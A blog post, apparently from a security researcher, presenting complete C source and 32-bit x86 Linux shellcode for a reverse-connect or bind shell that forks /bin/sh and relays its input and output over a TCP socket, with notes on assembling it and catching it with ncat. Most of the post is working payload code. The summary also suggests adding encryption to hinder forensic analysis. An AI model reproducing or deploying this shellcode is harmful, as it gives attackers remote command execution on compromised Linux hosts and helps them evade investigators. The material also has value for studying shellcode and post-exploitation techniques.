Shellcode: Synchronous shell for Linux in x86 assembly

Introduction

Nowadays, most systems running on the x86 architecture take full advantage of AMD64 or INTEL64 extensions to increase performance, so I realize some of you will be disappointed this isn’t written in amd64 assembly. There will be a follow up post about that later.

Here’s a bare-bones synchronous shell for Linux written in C, and an implementation of that code in x86 assembly. Once you’re familiar with how the synchronous shell works, you can include additional components like Diffie Hellman key exchange and authenticated encryption.

UNIX Assembly components (shellcodes) presented at Black Hat 2001 by the now defunct LSD research group is an excellent introduction on how to write UNIX shellcodes for various CPU architectures. There’s no content in the paper about AArch/AArch64 (ARM) or AMD 64-bit extensions which weren’t available until after the publication, but the x86 information is still solid 17 years later and might be worth a look if you’re not familiar Linux based shellcodes already.

Another valuable resource for x86 is a mirror of the Linux assembly website by Konstantin Boldyshev.

C source

The shell itself is kept as simple as possible. There’s very little if any error checking performed, and the shell spawned is very basic.

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                pid, fd, in[2], out[2];
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};
  
    // create pipes for redirection of stdin/stdout/stderr
    pipe(in);
    pipe(out);

    // fork process
    pid = fork();
    
    // if child process
    if (pid==0){
      // assign read end to stdin
      dup2(in[0], STDIN_FILENO);
      // assign write end to stdout   
      dup2(out[1], STDOUT_FILENO);
      // assign write end to stderr  
      dup2(out[1], STDERR_FILENO);  
      
      // close pipes
      close(in[0]); close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r=accept(s, 0, 0);
        s2=s; s=r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r=connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if(r>=0){
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;){
          r = epoll_wait(efd, &evts, 1, -1);
                  
          // error? bail out           
          if (r<=0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          // assign socket or read end of output
          r=(fd==s)?s:out[0];
          // assign socket or write end of input
          w=(fd==s)?in[1]:s;

          // read from socket or stdout        
          len=read(r, buf, BUFSIZ);
          
          // encrypt/decrypt data here
          
          // write to socket or stdin        
          write(w, buf, len);        
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // terminate shell      
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

x86 assembly

Stack structure

struc ds_tbl
  @p_in  resd 2     ; pipe for stdin of shell
  @in0   equ  @p_in
  @in1   equ  @p_in+4
  
  @p_out resd 2     ; pipe for stdout/stderr of shell
  @out0  equ  @p_out
  @out1  equ  @p_out+4
  
  @pid   resd 1     ; process id for shell
  @s     resd 1     ; socket handle
%ifdef BIND
  @s2    resd 1     ; socket for bind
%endif
  @efd   resd 1     ; event handle
  @evts  resb epoll_event_size
  @buf   resb BUFSIZ
endstruc

Assembly code

; -----------------------------------------------
; Synchronous shell for 32-bit Linux
;
; 314 bytes for connect
; 352 bytes for bind
;
; -----------------------------------------------

      %include "include.inc"

      %ifndef BIN
        global main
        global _main
      %endif     
           
      bits 32
    
main:    
_main:
      pushad
      ; allocate space for variables
      xor    ecx, ecx
      mul    ecx
      mov    cl, ds_tbl_size
      sub    esp, ecx
      mov    ebp, esp
      ; create pipes for redirection of stdin/stdout/stderr
      mov    edi, ebp
      mov    cl, 2
c_pipe:      
      ; pipe(in);
      ; pipe(out);
      mov    al, SYS_pipe
      mov    ebx, edi        ; ebx = p_in or p_out      
      int    0x80      
      scasd                  ; edi += 4
      scasd                  ; edi += 4
      loop   c_pipe    
      
      ; fork process
      ; pid = fork();
      mov    al, SYS_fork
      int    0x80    
      stosd                  ; save pid
      test   eax, eax        ; already forked?
      jnz    opn_con         ; open connection
      
      ; in this order..
      ;
      ; dup2 (out[1], STDERR_FILENO)      
      ; dup2 (out[1], STDOUT_FILENO)
      ; dup2 (in[0],  STDIN_FILENO )   
      mov    cl, 3                ; ecx = STDERR_FILENO + 1
      mov    ebx, [ebp+@out1]     ; ebx = out[1]
c_dup:
      mov    al, SYS_dup2
      dec    ecx             ; becomes STDOUT_FILENO, then STDIN_FILENO      
      cmovz  ebx, [ebp+@in0] ; replace stdin with in[0]      
      int    0x80
      jnz    c_dup  
  
      ; close pipe handles in this order..
      ;
      ; close(in[0]);
      ; close(in[1]);
      ; close(out[0]);
      ; close(out[1]);
      mov    esi, ebp          ; esi = p_in and p_out
      mov    cl, 4             ; close 4 handles     
cls_pipe:
      lodsd                    ; eax = pipes[i]
      xchg   eax, ebx      
      push   SYS_close
      pop    eax 
      int    0x80
      loop   cls_pipe      
      
      ; execve("/bin//sh", 0, 0);
      mov    al, SYS_execve
      push   ecx               ; push null terminator
      push   '//sh'
      push   '/bin'
      mov    ebx, esp          ; ebx = "/bin//sh", 0
      int    0x80
opn_con:    
      ; close(in[0]);
      push   SYS_close
      pop    eax
      mov    ebx, [ebp+@in0]    
      int    0x80    

      ; close(out[1]);
      mov    al, SYS_close     
      mov    ebx, [ebp+@out1]    
      int    0x80   
      
      ; s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     
      mov    al, SYS_socketcall
      push   SYS_SOCKET        ; ebx = 1
      pop    ebx
      push   edx               ; protocol = IPPROTO_IP
      push   ebx               ; type     = SOCK_STREAM
      push   2                 ; family   = AF_INET
      mov    ecx, esp          ; ecx      = &args      
      int    0x80 
      add    esp, 3*4          ; release args to socket
      stosd                    ; save socket
      
      %ifdef BIND
        push edx               ; sa.sin_addr=INADDR_ANY
      %else
        push 0x0100007f        ; sa.sin_addr=127.0.0.1
      %endif
      push   0xD2040002        ; sa.sin_port=htons(1234)
                               ; sa.sin_family=AF_INET
      mov    ecx, esp          ; ecx = &sa
      
      push   16                ; sizeof(sa)      
      push   ecx               ; &sa
      push   eax               ; s
      mov    ecx, esp          ; &args       
%ifdef BIND  
      push   SYS_socketcall
      pop    eax
      ; bind (s, &sa, sizeof(sa));
      inc    ebx                ; ebx = 2, SYS_BIND     
      int    0x80
      add    esp, 5*4           ; release sa and args to connect
      test   eax, eax
      jnz    cls_sck
      
      sub    esp, 5*4
      mov    [ecx+4], eax       ; clear sa from args

      ; listen (s, 0);
      mov    al, SYS_socketcall
      mov    bl, SYS_LISTEN     ; ebx = 4
      int    0x80

      ; accept (s, 0, 0);
      mov    al, SYS_socketcall
      inc    ebx                ; ebx = 5, SYS_ACCEPT
      int    0x80
      add    esp, 5*4           ; release sa and args to connect
      test   eax, eax
      jl     cls_sck
      
      xchg   dword[ebp+@s], eax ; swap with s
      stosd                     ; save as s2
%else
      ; connect (s, &sa, sizeof(sa)); 
      push   SYS_socketcall
      pop    eax
      mov    bl, SYS_CONNECT    ; ebx = 3
      int    0x80      
      add    esp, 5*4           ; release sa and args to connect
      test   eax, eax
      jl     cls_sck
%endif
      ; efd = epoll_create1(0);
      mov    al, SYS_epoll_create1 & 0xFF
      mov    ah, SYS_epoll_create1 >> 8
      xor    ebx, ebx           ; sets CF=0
      int    0x80
      stosd                     ; save efd
      
      ; add 2 descriptors to monitor stdout and socket
      xchg   eax, ebx           ; ebx = efd
      mov    edx, [ebp+@s]       
poll_init:
      ; epoll_ctl(efd, EPOLL_CTL_ADD, i==0 ? s : out[0], &evts);
      mov    esi, edi
      push   EPOLLIN
      pop    eax               ; evts.events = EPOLLIN
      mov    [esi+events], eax
      mov    [esi+data  ], edx ; evts.data.fd = i==0 ? s : out[0]
      mov    al, SYS_epoll_ctl    
      push   EPOLL_CTL_ADD
      pop    ecx
      int    0x80
      mov    edx, [ebp+@out0]  ; do out[0] in 2nd loop      
      cmc                      ; !CF
      jc     poll_init      
      ; now loop until user exits or some other error      
poll_wait:
      ; epoll_wait(efd, &evts, 1, -1);
      mov    esi, -1
      xor    eax, eax          ; eax = SYS_epoll_wait
      mov    ah, 1        
      cdq                      ; edx = 0
      inc    edx               ; edx = 1 event 
      mov    ecx, edi          ; ecx = evts
      mov    ebx, [ebp+@efd]
      int    0x80
      
      ; if (r <= 0) break;
      dec    eax               ; test   eax, eax
      jnz    cls_efd           ; jle    cls_efd
      
      mov    esi, edi
      lodsd                    ; eax = evt.events
      
      ; if (!(evts.events & EPOLLIN)) break;
      dec    eax               ; test   al, EPOLLIN
      jnz    cls_efd

      lodsd                    ; eax = evt.data.fd       
      ; r=(fd==s)?s:out[0];
      ; w=(fd==s)?in[1]:s;
      xchg   ebx, eax          ; ebx = evt.data.fd
      cmp    ebx, [ebp+@s]     ; if socket event
      cmove  eax, [ebp+@in1]   ; write to in[1]
      cmovne eax, [ebp+@s]     ; else read from out[0], write to s
      push   eax
      
      ; read(r, buf, BUFSIZ, 0);
      xor    esi, esi          ; esi = 0
      mov    ecx, edi          ; ecx = buf
      cdq                      ; edx = 0
      mov    dl, BUFSIZ        ; edx = BUFSIZ
      push   SYS_read          ; eax = SYS_read
      pop    eax
      int    0x80
      
      ; encrypt/decrypt buffer
      
      ; write(w, buf, len);
      xchg   eax, edx          ; edx = len
      mov    al, SYS_write
      pop    ebx               ; s or in[1]
      int    0x80
      jmp    poll_wait
cls_efd: 
      ; remove 2 descriptors
      xor    esi, esi          ; esi = NULL
      mov    edx, [ebp+@s]
cls_loop:
      ; epoll_ctl(efd, EPOLL_CTL_DEL, fd, NULL);
      mov    eax, esi
      mov    al, SYS_epoll_ctl
      push   EPOLL_CTL_DEL
      pop    ecx
      mov    ebx, [ebp+@efd]
      int    0x80
            
      ; do out[0] next      
      mov    edx, [ebp+@out0]
      cmc
      jc     cls_loop
           
      ; close(efd);
      mov    al, SYS_close
      int    0x80
cls_sck:
      ; shutdown socket
      ; shutdown(s, SHUT_RDWR);
      push   SYS_shutdown & 0xFF
      pop    eax
      mov    ah, 1
      push   SHUT_RDWR
      pop    ecx
      mov    ebx, [ebp+@s]
      int    0x80
      
      ; close(s);
      push   SYS_close
      pop    eax
      int    0x80
%ifdef BIND
      ; close(s2);
      mov    al, SYS_close
      mov    ebx, [ebp+@s2]
      int    0x80
%endif 
      ; terminate /bin/sh
      ; kill(pid, SIGCHLD);
      mov    al, SYS_kill
      mov    cl, SIGCHLD
      mov    ebx, [ebp+@pid]
      int    0x80

      ; close(in[1]);
      mov    al, SYS_close    
      mov    ebx, [ebp+@in1]
      int    0x80   

      ; close(out[0]);
      mov    al, SYS_close    
      mov    ebx, [ebp+@out0]
      int    0x80   
      
      ; only include exit system call
      ; if compiled as ELF
%ifndef BIN
      ; exit(0);
      mov    al, SYS_exit
      int    0x80
%else
      ; release memory 
      add    esp, ds_tbl_size
      ; restore registers
      popad
      ret
%endif

Testing

You can assemble as 32-bit ELF for either bind or connect functionality. define BIND in the source or on the command line when assembling. For a standalone binary, do the following.

The only reason -m32 is used with GCC here is because I’m compiling on a 64-bit system with multi-arch support enabled. On a native 32-bit system, this would not be required.

For this shell, ncat or netcat is perfectly fine. Here’s an example of using ncat as listener for reverse connect shell.

Summary

Because we use signals or events to monitor I/O operations between network and child process, we can manipulate the data being sent and received. Enabling encryption would hinder any forensic analysis of data passing over the network.

Ideally, it should perform key exchange with something like Diffie-Hellman to establish a shared key before using authenticated encryption to protect data between two systems.

Sources here

This entry was posted in assembly, linux, security, shellcode and tagged , , , . Bookmark the permalink.

3 Responses to Shellcode: Synchronous shell for Linux in x86 assembly

  1. Pingback: Shellcode: Synchronous shell for Linux in amd64 assembly | modexp

  2. Pingback: Synchronous shell for Linux in ARM32 assembly | modexp

  3. Pingback: Shellcode: Encrypting traffic | modexp

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s